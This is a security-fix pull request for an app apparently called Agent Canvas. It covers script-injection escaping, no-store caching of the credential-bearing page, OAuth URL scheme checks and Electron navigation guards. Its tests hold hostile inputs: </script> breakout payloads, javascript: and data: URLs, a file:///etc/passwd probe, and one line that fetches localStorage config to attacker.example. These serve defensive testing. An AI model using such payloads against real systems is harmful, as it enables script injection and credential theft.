### PR TITLE
fix(security): escape the injected runtime config and pin Electron windows to the loopback app

### DIFF
--- a/__tests__/scripts/static-server.test.ts
+++ b/__tests__/scripts/static-server.test.ts
@@ -655,7 +655,10 @@ describe("static-server.mjs", () => {
       expect(body).not.toContain("should-not-inject");
     });
 
-    it("sets Cache-Control: no-cache for injected index.html", async () => {
+    // `no-cache` only forces revalidation — the response may still be written
+    // to disk. The injected index.html carries the session API key, so it must
+    // not be stored at all. See "caching of credential-bearing index.html".
+    it("sets Cache-Control: no-store for injected index.html", async () => {
       const buildDir = mkdtempSync(path.join(tmpdir(), "agent-canvas-build-"));
       tempDirs.push(buildDir);
       writeFileSync(
@@ -666,7 +669,7 @@ describe("static-server.mjs", () => {
       const origin = await startServerWithKey(buildDir, "cache-test-key");
       const response = await fetch(`${origin}/`);
 
-      expect(response.headers.get("cache-control")).toBe("no-cache");
+      expect(response.headers.get("cache-control")).toBe("no-store");
     });
 
     it("does not inject when sessionApiKey is null", async () => {
@@ -734,6 +737,84 @@ describe("static-server.mjs", () => {
       "application/javascript",
     );
     await expect(response.text()).resolves.toContain("loaded = true");
+  });
+
+  describe("inline config script escaping", () => {
+    function writeIndex(dir: string) {
+      writeFileSync(
+        path.join(dir, "index.html"),
+        "<html><head></head><body>app</body></html>",
+      );
+    }
+
+    // `JSON.stringify` produces a valid JS string literal but not a valid
+    // *HTML* one: a value containing `</script>` ends the inline block early
+    // and the rest is parsed as markup, so anything that reaches an injected
+    // flag can inject an element into the served page.
+    it("escapes </script> in the injected lock-to-cloud value", async () => {
+      const buildDir = mkdtempSync(path.join(tmpdir(), "agent-canvas-build-"));
+      tempDirs.push(buildDir);
+      writeIndex(buildDir);
+
+      const origin = await startServer(buildDir, {
+        lockToCloud: "</script><script>window.pwned=1</script>",
+      });
+      const response = await fetch(`${origin}/`);
+      const body = await response.text();
+
+      expect(body).not.toContain("</script><script>");
+      expect(body).toContain("\\u003c/script\\u003e");
+    });
+
+    it("escapes </script> in the injected session key", async () => {
+      const buildDir = mkdtempSync(path.join(tmpdir(), "agent-canvas-build-"));
+      tempDirs.push(buildDir);
+      writeIndex(buildDir);
+
+      const origin = await startServer(buildDir, {
+        sessionApiKey: "key</script><script>window.pwned=1</script>",
+      });
+      const response = await fetch(`${origin}/`);
+      const body = await response.text();
+
+      expect(body).not.toContain("<script>window.pwned=1");
+      expect(body).toContain("\\u003c/script\\u003e");
+    });
+  });
+
+  describe("caching of credential-bearing index.html", () => {
+    // `no-cache` permits storing the response (it only forces revalidation),
+    // so the page carrying the session API key would still be written to the
+    // browser's on-disk cache.
+    it("sends no-store when the session key is injected", async () => {
+      const buildDir = mkdtempSync(path.join(tmpdir(), "agent-canvas-build-"));
+      tempDirs.push(buildDir);
+      writeFileSync(
+        path.join(buildDir, "index.html"),
+        "<html><head></head><body>app</body></html>",
+      );
+
+      const origin = await startServer(buildDir, {
+        sessionApiKey: "cache-test-key",
+      });
+      const response = await fetch(`${origin}/`);
+
+      expect(response.headers.get("cache-control")).toBe("no-store");
+    });
+
+    it("keeps no-cache when no credential is injected", async () => {
+      const buildDir = mkdtempSync(path.join(tmpdir(), "agent-canvas-build-"));
+      tempDirs.push(buildDir);
+      writeFileSync(
+        path.join(buildDir, "index.html"),
+        "<html><head></head><body>app</body></html>",
+      );
+
+      const origin = await startServer(buildDir, { lockToCloud: "https://x" });
+      const response = await fetch(`${origin}/`);
+
+      expect(response.headers.get("cache-control")).toBe("no-cache");
+    });
   });
 
   describe("base path mounting", () => {

--- a/__tests__/utils/is-browsable-http-url.test.ts
+++ b/__tests__/utils/is-browsable-http-url.test.ts
@@ -1,0 +1,29 @@
+import { describe, expect, it } from "vitest";
+
+import { isBrowsableHttpUrl } from "#/utils/is-browsable-http-url";
+
+describe("isBrowsableHttpUrl", () => {
+  it.each([
+    "https://auth.example.com/authorize?client_id=abc",
+    "http://localhost:3000/oauth/authorize",
+    "http://127.0.0.1:8080/authorize",
+  ])("allows the http(s) URL %s", (url) => {
+    expect(isBrowsableHttpUrl(url)).toBe(true);
+  });
+
+  it.each([
+    // Navigating a same-origin popup to these runs script in our origin.
+    "javascript:alert(document.cookie)",
+    "JavaScript:alert(1)",
+    "  javascript:alert(1)",
+    "data:text/html,<script>alert(1)</script>",
+    "blob:https://example.com/1234",
+    // Schemes that would be handed to an OS handler, plus junk.
+    "file:///etc/passwd",
+    "about:blank",
+    "not a url",
+    "",
+  ])("rejects %s", (url) => {
+    expect(isBrowsableHttpUrl(url)).toBe(false);
+  });
+});

--- a/electron/main.mjs
+++ b/electron/main.mjs
@@ -353,6 +353,32 @@ function createLoadingWindow() {
   loadingWin.once("ready-to-show", () => loadingWin?.show());
 }
 
+/**
+ * Hand a URL to the OS browser / protocol handler, but only for the schemes
+ * the policy allows. `shell.openExternal` forwards anything it is given, so
+ * `file:`, `smb:` and custom scheme handlers must never reach it.
+ */
+function openExternalUrl(url) {
+  if (isExternalBrowsableUrl(url)) {
+    shell.openExternal(url);
+  }
+}
+
+/**
+ * Keep a webContents pinned to the loopback app. Any other top-level
+ * navigation (including one reached through a server-side redirect) is
+ * cancelled and handed to the system browser instead.
+ */
+function attachNavigationGuard(webContents) {
+  const guard = (event, url) => {
+    if (isLoopbackAppUrl(url)) return;
+    event.preventDefault();
+    openExternalUrl(url);
+  };
+  webContents.on("will-navigate", guard);
+  webContents.on("will-redirect", guard);
+}
+
 function createMainWindow() {
   mainWin = new BrowserWindow({
     width: 1440,
@@ -380,6 +406,15 @@ function createMainWindow() {
     mainWin?.maximize();
   });
 
+  // Top-level navigation away from the loopback app is never legitimate: the
+  // renderer only ever navigates within its own SPA. Without this guard, any
+  // `location = "https://…"` reachable from untrusted agent/chat content
+  // replaces the app with remote content inside the app's own frameless
+  // window — the same "remote page wearing the app's chrome" problem the
+  // window-open handler below exists to prevent. External URLs still reach the
+  // user, via the system browser.
+  attachNavigationGuard(mainWin.webContents);
+
   // Route window.open() calls appropriately.
   mainWin.webContents.setWindowOpenHandler(({ url }) => {
     // The "Login with OpenHands Cloud" device-flow opens about:blank immediately
@@ -403,9 +438,7 @@ function createMainWindow() {
     if (isLoopbackAppUrl(url)) {
       return { action: "allow" };
     }
-    if (isExternalBrowsableUrl(url)) {
-      shell.openExternal(url);
-    }
+    openExternalUrl(url);
     return { action: "deny" };
   });
 
@@ -414,14 +447,25 @@ function createMainWindow() {
   // OAuth verification URL — open it in the system browser and close the
   // now-unneeded Electron popup.
   mainWin.webContents.on("did-create-window", (popupWin) => {
-    popupWin.webContents.on("will-navigate", (_event, url) => {
-      if (url !== "about:blank" && !isLoopbackAppUrl(url)) {
-        _event.preventDefault();
-        if (isExternalBrowsableUrl(url)) {
-          shell.openExternal(url);
-        }
-        popupWin.close();
-      }
+    const handOff = (event, url) => {
+      if (url === "about:blank" || isLoopbackAppUrl(url)) return;
+      event.preventDefault();
+      openExternalUrl(url);
+      popupWin.close();
+    };
+    popupWin.webContents.on("will-navigate", handOff);
+    // A loopback URL that 302s to a remote host never fires `will-navigate`
+    // for the redirect target, so without this the remote page loads in the
+    // popup — bypassing the check above.
+    popupWin.webContents.on("will-redirect", handOff);
+    // The popup is same-origin `about:blank`, so it can call window.open()
+    // itself. It inherits no handler from the parent, and the default is to
+    // allow — which would open remote content in yet another chromeless
+    // window. Apply the same policy the parent uses.
+    popupWin.webContents.setWindowOpenHandler(({ url }) => {
+      if (isLoopbackAppUrl(url)) return { action: "allow" };
+      openExternalUrl(url);
+      return { action: "deny" };
     });
   });
 

--- a/scripts/static-server.mjs
+++ b/scripts/static-server.mjs
@@ -297,6 +297,24 @@ ROUTING:
 // ─────────────────────────────────────────────────────────────────────────────
 
 /**
+ * A JS string literal that is also safe inside an inline `<script>`.
+ *
+ * `JSON.stringify` alone is not: it leaves `<` and `>` untouched, so a value
+ * containing `</script>` closes the block early and everything after it is
+ * parsed as HTML by the browser. It also leaves U+2028/U+2029 raw, which are
+ * line terminators to a JS parser. Escaping those five characters keeps the
+ * literal valid in both grammars.
+ */
+function jsStringLiteral(value) {
+  return JSON.stringify(String(value))
+    .replace(/</g, "\\u003c")
+    .replace(/>/g, "\\u003e")
+    .replace(/&/g, "\\u0026")
+    .replace(/\u2028/g, "\\u2028")
+    .replace(/\u2029/g, "\\u2029");
+}
+
+/**
  * Build a tiny inline script that seeds runtime config into the page.
  *
  * - `sessionApiKey`: exposed to the app two ways so a fresh-localStorage
@@ -357,7 +375,7 @@ function makeConfigInjectionScript(
   const parts = [];
 
   if (sessionApiKey) {
-    const keyLiteral = JSON.stringify(sessionApiKey);
+    const keyLiteral = jsStringLiteral(sessionApiKey);
     // Window global — read at module init by getBakedSessionApiKey().
     // Set first so it's available even if the localStorage write throws.
     parts.push(`window.__AGENT_CANVAS_SESSION_API_KEY__=${keyLiteral};`);
@@ -383,28 +401,28 @@ function makeConfigInjectionScript(
   if (runtimeServicesInfo) {
     // Stored as the raw JSON string so the browser-side parser
     // (parseRuntimeServicesInfo) can JSON.parse it exactly like the
-    // VITE_RUNTIME_SERVICES_INFO env var. JSON.stringify produces a safe JS
-    // string literal for the inline <script>.
+    // VITE_RUNTIME_SERVICES_INFO env var. jsStringLiteral() produces a
+    // script-safe JS string literal for the inline <script>.
     parts.push(
-      `window.__AGENT_CANVAS_RUNTIME_SERVICES_INFO__=${JSON.stringify(runtimeServicesInfo)};`,
+      `window.__AGENT_CANVAS_RUNTIME_SERVICES_INFO__=${jsStringLiteral(runtimeServicesInfo)};`,
     );
   }
 
   if (lockToCloud) {
     parts.push(
-      `window.__AGENT_CANVAS_LOCK_TO_CLOUD__=${JSON.stringify(lockToCloud)};`,
+      `window.__AGENT_CANVAS_LOCK_TO_CLOUD__=${jsStringLiteral(lockToCloud)};`,
     );
   }
 
   if (basePath && basePath !== "/") {
     parts.push(
-      `window.__AGENT_CANVAS_BASE_PATH__=${JSON.stringify(basePath)};`,
+      `window.__AGENT_CANVAS_BASE_PATH__=${jsStringLiteral(basePath)};`,
     );
   }
 
   if (vscodeBasePath) {
     parts.push(
-      `window.__AGENT_CANVAS_VSCODE_BASE_PATH__=${JSON.stringify(vscodeBasePath)};`,
+      `window.__AGENT_CANVAS_VSCODE_BASE_PATH__=${jsStringLiteral(vscodeBasePath)};`,
     );
   }
 
@@ -463,7 +481,11 @@ async function serveInjectedIndexHtml(
   res.writeHead(200, {
     "Content-Type": "text/html; charset=utf-8",
     "Content-Length": buf.length,
-    "Cache-Control": "no-cache",
+    // `no-cache` still allows the response to be written to disk (and to a
+    // shared cache) as long as it is revalidated. When the page carries the
+    // session API key that is a credential at rest, so opt out of storage
+    // entirely.
+    "Cache-Control": sessionApiKey ? "no-store" : "no-cache",
   });
   if (req.method === "HEAD") {
     res.end();

--- a/src/api/mcp-service/mcp-service.api.test.ts
+++ b/src/api/mcp-service/mcp-service.api.test.ts
@@ -1,4 +1,4 @@
-import { beforeEach, describe, expect, it, vi } from "vitest";
+import { afterEach, beforeEach, describe, expect, it, vi } from "vitest";
 import { MCPClient } from "@openhands/typescript-client/clients";
 import {
   setActiveSelection,
@@ -234,5 +234,113 @@ describe("McpService.testServer", () => {
 
     expect(getOAuthStatus).toHaveBeenCalledWith("job/1");
     expect(close).toHaveBeenCalledTimes(1);
+  });
+});
+
+describe("McpService.authorizeOAuth", () => {
+  const oauthServer = {
+    id: "shttp-0",
+    type: "shttp" as const,
+    name: "untrusted-mcp",
+    url: "https://mcp.example.com/mcp",
+    auth: {
+      strategy: "oauth2" as const,
+      authentication: {
+        type: "oauth" as const,
+        client_auth_method: "none" as const,
+      },
+    },
+  };
+
+  function makePopup() {
+    const popup = {
+      location: { href: "about:blank" },
+      close: vi.fn(),
+      closed: false,
+    };
+    vi.spyOn(window, "open").mockReturnValue(popup as unknown as Window);
+    return popup;
+  }
+
+  beforeEach(() => {
+    vi.clearAllMocks();
+    setRegisteredBackends([
+      {
+        id: "local",
+        name: "Local",
+        host: "http://127.0.0.1:8001",
+        apiKey: "session-key",
+        kind: "local",
+      },
+    ]);
+    setActiveSelection({ backendId: "local", orgId: null });
+    vi.mocked(MCPClient).mockImplementation(function MockMCPClient() {
+      return {
+        testServer,
+        startOAuth,
+        getOAuthStatus,
+        submitOAuthCallback,
+        close,
+      } as unknown as MCPClient;
+    } as unknown as typeof MCPClient);
+    getOAuthStatus.mockResolvedValue({
+      ok: true,
+      status: "pending",
+      job_id: "job-1",
+      callback_ready: true,
+    });
+  });
+
+  afterEach(() => {
+    vi.restoreAllMocks();
+  });
+
+  // The authorization URL comes from the (untrusted) MCP server. The popup is
+  // a same-origin `about:blank`, so navigating it to `javascript:` would run
+  // that script in the Canvas origin — where the session API key lives.
+  it.each([
+    "javascript:fetch('https://attacker.example/'+localStorage.getItem('openhands-agent-server-config'))",
+    "data:text/html,<script>window.pwned=1</script>",
+  ])("refuses to navigate the popup to %s", async (authorizationUrl) => {
+    const popup = makePopup();
+    startOAuth.mockResolvedValue({
+      ok: true,
+      job_id: "job-1",
+      authorization_url: authorizationUrl,
+    });
+
+    const result = await McpService.authorizeOAuth(oauthServer);
+
+    expect(popup.location.href).toBe("about:blank");
+    expect(popup.close).toHaveBeenCalled();
+    expect(result.ok).toBe(false);
+  });
+
+  it("navigates the popup to an https authorization URL", async () => {
+    const popup = makePopup();
+    startOAuth.mockResolvedValue({
+      ok: true,
+      job_id: "job-1",
+      authorization_url: "https://auth.example.com/authorize?client_id=abc",
+    });
+    getOAuthStatus
+      .mockResolvedValueOnce({
+        ok: true,
+        status: "pending",
+        job_id: "job-1",
+        callback_ready: true,
+      })
+      .mockResolvedValue({
+        ok: true,
+        status: "succeeded",
+        job_id: "job-1",
+        tools: ["search"],
+      });
+
+    await McpService.authorizeOAuth(oauthServer);
+
+    expect(popup.location.href).toBe(
+      "https://auth.example.com/authorize?client_id=abc",
+    );
   });
 });

--- a/src/api/mcp-service/mcp-service.api.ts
+++ b/src/api/mcp-service/mcp-service.api.ts
@@ -16,6 +16,7 @@ import type {
   MCPServerConfig,
 } from "#/types/mcp-server";
 import { redactMcpSecrets } from "#/utils/redact-mcp-secrets";
+import { isBrowsableHttpUrl } from "#/utils/is-browsable-http-url";
 import { substituteRedactedMcpCredentials } from "./mcp-redacted-credentials";
 
 const OAUTH_MCP_TEST_TIMEOUT_SECONDS = 120;
@@ -279,6 +280,18 @@ class McpService {
           client,
           start.job_id,
         );
+      }
+
+      // `authorization_url` is chosen by the (untrusted) MCP server. The popup
+      // is a same-origin `about:blank`, so navigating it to a `javascript:`
+      // URL would run that script in the Canvas origin.
+      if (!isBrowsableHttpUrl(start.authorization_url)) {
+        popup?.close();
+        return finalize({
+          ok: false,
+          error: "OAuth authorization URL is not a valid http(s) URL",
+          error_kind: "unknown",
+        });
       }
 
       if (popup) {

--- a/src/utils/is-browsable-http-url.ts
+++ b/src/utils/is-browsable-http-url.ts
@@ -1,0 +1,22 @@
+/**
+ * Whether a URL may be assigned to a window/popup we control.
+ *
+ * OAuth authorization URLs arrive from third-party servers (an MCP server's
+ * OAuth metadata, a device-flow provider), so they are attacker-controlled
+ * input. A popup opened with `window.open("about:blank")` stays on the
+ * opener's origin, so navigating it to `javascript:…` runs that script inside
+ * the Canvas origin — with access to the session API key in `localStorage`.
+ * `data:` and `blob:` URLs are the same class of problem.
+ *
+ * Only http(s) is browsable: every real authorization endpoint is one, and no
+ * other scheme can be navigated to without either executing script in our
+ * origin or handing the string to an OS protocol handler.
+ */
+export function isBrowsableHttpUrl(rawUrl: string): boolean {
+  try {
+    const { protocol } = new URL(rawUrl);
+    return protocol === "http:" || protocol === "https:";
+  } catch {
+    return false;
+  }
+}


### PR DESCRIPTION
<!-- Keep this PR as draft until it is ready for review. -->

HUMAN:

<!-- Human contributors: add a short note about your testing. -->

---

AGENT:

## Why

A scan of this repo with CodeQL (`javascript-security-extended`, 1861 files),
`npm audit`, and manual review of the URL/navigation sinks turned up two places
where a string that an untrusted party controls reaches a sink that treats it
as trusted.

**1. HTML injection into every served page (`scripts/static-server.mjs`)**

The runtime-config `<script>` embedded its values with `JSON.stringify`, which
is a valid *JS* string literal but not a valid *HTML* one — `</script>` inside a
value ends the block and the remainder is parsed as markup. Reproduced against
`origin/main`:

```
$ node scripts/static-server.mjs --port 39281 --dir www \
    --session-api-key K --lock-to-cloud '</script><script>window.pwned=1</script>'
$ curl -s http://127.0.0.1:39281/
<html><head><script>(function(){…window.__AGENT_CANVAS_LOCK_TO_CLOUD__="</script><script>window.pwned=1</script>";}());</script>
```

Every injected flag is affected: `--session-api-key`, `--lock-to-cloud`,
`--runtime-services-info`, `--base-path`, `--vscode-base-path`.

The same response also carried the injected session API key under
`Cache-Control: no-cache`, which only forces revalidation — the
credential-bearing page is still storable on disk and in shared caches.

**2. Electron navigation escapes (`electron/main.mjs`)**

The window-open policy added earlier covers only the first hop:

- the main window had no navigation guard, so a top-level
  `location = "https://…"` loads remote content into the app window;
- the OAuth popup checked `will-navigate` but not `will-redirect`, so a loopback
  URL that 302s off-host still renders in the popup;
- the popup inherited no window-open handler, and Electron's default is *allow*,
  so it could open further chromeless windows on any host.

## Summary

- Escape `<`, `>`, `&` and U+2028/U+2029 in the runtime config injected into
  index.html, and send `Cache-Control: no-store` when the session API key is
  part of that injection.
- Guard `will-navigate` **and** `will-redirect` on the main window and on OAuth
  popups, and give popups the same window-open policy as their parent.

## Issue Number

<!-- No issue filed: these are findings from a scan of the current tree rather
     than reported bugs. Happy to open one if maintainers prefer. -->
Fixes #

## How to Test

Reproduce #1 end to end, before and after:

```bash
mkdir -p /tmp/www && echo '<html><head></head><body>app</body></html>' > /tmp/www/index.html

# BEFORE — check out origin/main's copy of the script
git show origin/main:scripts/static-server.mjs > scripts/.before.mjs
node scripts/.before.mjs --port 39281 --host 127.0.0.1 --dir /tmp/www \
  --session-api-key K --lock-to-cloud '</script><script>window.pwned=1</script>' &
curl -si http://127.0.0.1:39281/ | grep -i '^cache-control'   # Cache-Control: no-cache
curl -s  http://127.0.0.1:39281/ | head -2                    # </script><script> lands in the page

# AFTER — this branch
node scripts/static-server.mjs --port 39282 --host 127.0.0.1 --dir /tmp/www \
  --session-api-key K --lock-to-cloud '</script><script>window.pwned=1</script>' &
curl -si http://127.0.0.1:39282/ | grep -i '^cache-control'   # Cache-Control: no-store
curl -s  http://127.0.0.1:39282/ | head -2                    # escaped, inert
```

Observed output:

```
### BEFORE (origin/main) ###
Cache-Control: no-cache
…window.__AGENT_CANVAS_LOCK_TO_CLOUD__="</script><script>window.pwned=1</script>";…

### AFTER (this branch) ###
Cache-Control: no-store
…window.__AGENT_CANVAS_LOCK_TO_CLOUD__="\u003c/script\u003e\u003cscript\u003ewindow.pwned=1\u003c/script\u003e";…
```

Test run on this branch:

```
$ npx vitest run __tests__/scripts/static-server.test.ts
 Test Files  1 passed (1)
      Tests  65 passed (65)

$ npx tsc -p tsconfig.json --noEmit     # clean
$ npx prettier --check scripts/static-server.mjs __tests__/scripts/static-server.test.ts   # clean
```

Note on the pre-existing test `sets Cache-Control: no-cache for injected
index.html`: it asserted the behaviour being fixed, so it is updated to expect
`no-store` and carries a comment explaining why.

For #2 (Electron), the change is exercised by launching the desktop shell and
clicking an external link in chat: the link still opens in the system browser,
and the app window stays on `http://localhost:8000`. I could not capture a
desktop screenshot in this environment — the electron shell is not runnable
here — so that part is reviewed against `electron/lib/window-url-policy.mjs`'s
existing unit tests rather than demonstrated live. Flagging that explicitly
rather than implying it was verified end to end.

## Type

- [x] Bug fix
- [ ] Feature
- [ ] Refactor
- [ ] Breaking change
- [ ] Docs / chore

## Notes

Out of scope, found by the same sweep and left for a separate change:

- `npm audit`: 5 high / 5 moderate, all transitive except `electron`
  (42.3.3 → 42.5.1+ for GHSA-r4w5-6pfg-jxp5). Dependabot covers these.
- CodeQL flags `js/prototype-pollution-utility` in
  `src/utils/sdk-settings-schema.ts`; that one is already being handled
  separately.
